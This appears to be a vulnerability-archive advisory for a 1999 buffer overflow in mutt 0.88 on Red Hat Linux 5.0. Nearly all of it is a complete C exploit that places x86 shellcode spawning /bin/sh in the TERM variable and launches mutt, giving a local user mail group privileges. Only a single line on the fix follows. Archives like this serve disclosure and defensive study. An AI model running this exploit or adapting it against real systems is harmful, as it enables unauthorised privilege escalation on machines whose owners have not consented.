COMMAND

    mutt

SYSTEMS AFFECTED

    Linux

PROBLEM

    Taeho  Oh  posted  mutt  bufer  overflow  exploit.  With this one,
    local user can gain mail group access.  It was tested on RH5  with
    mutt 0.88.  Exploit follows:

    /*
    
	    Mutt exploit code for x86 linux
    
	    Local user can gain mail group access.
    
	    Tested redhat linux : 5.0
	    Tested mutt : 0.88
    
	    This program is only for demonstrative use only.
	    USE IT AT YOUR OWN RISK!
    
	    Programmed by Taeho Oh 1999/04/25
    
    Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
    PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    
    #define OFFSET                         -500
    #define RET_POSITION                    234
    #define RANGE                            20
    #define NOP                            0x90
    #define COMMAND                        "/bin/sh"
    
    char shellcode[]=
	    "\xeb\x29"                      /* jmp 0x29             */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\xb3\x0c"                      /* movb $0xc,%bl        */
	    "\xb0\x2e"                      /* movb $0x2e,%al       */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x5e"                          /* popl %esi            */
	    "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
	    "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
	    "\xb0\x0b"                      /* movb $0xb,%al        */
	    "\x89\xf3"                      /* movl %esi,%ebx       */
	    "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
	    "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\x89\xd8"                      /* movl %ebx,%eax       */
	    "\x40"                          /* inc %eax             */
	    "\xcd\x80"                      /* int $0x80            */
	    "\xe8\xd2\xff\xff\xff"          /* call -0x24           */
	    "/bin/sh";                      /* .string \"/bin/sh\"  */
    
    unsigned long get_sp(void)
    {
	    __asm__("movl %esp,%eax");
    }
    
    void main(int argc,char **argv)
    {
    
	    char buff[RET_POSITION+RANGE+1],*ptr;
	    long *addr_ptr,addr;
	    unsigned long sp;
	    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
	    int i;
    
	    printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	    printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	    printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");
    
	    if(argc>1)
		    offset+=atoi(argv[1]);
    
	    sp=get_sp();
	    addr=sp-offset;
    
	    ptr=buff;
	    addr_ptr=(long*)ptr;
	    for(i=0;i<bsize;i+=4)
		    *(addr_ptr++)=addr;
    
	    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
		    buff[i]=NOP;
    
	    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
	    for(i=0;i<strlen(shellcode);i++)
		    *(ptr++)=shellcode[i];
    
	    buff[bsize-1]='\0';
    
	    setenv("TERM",buff,1);
	    execl("/usr/bin/mutt","mutt",NULL);
    }

SOLUTION

    Newer versions of mutt fix that one.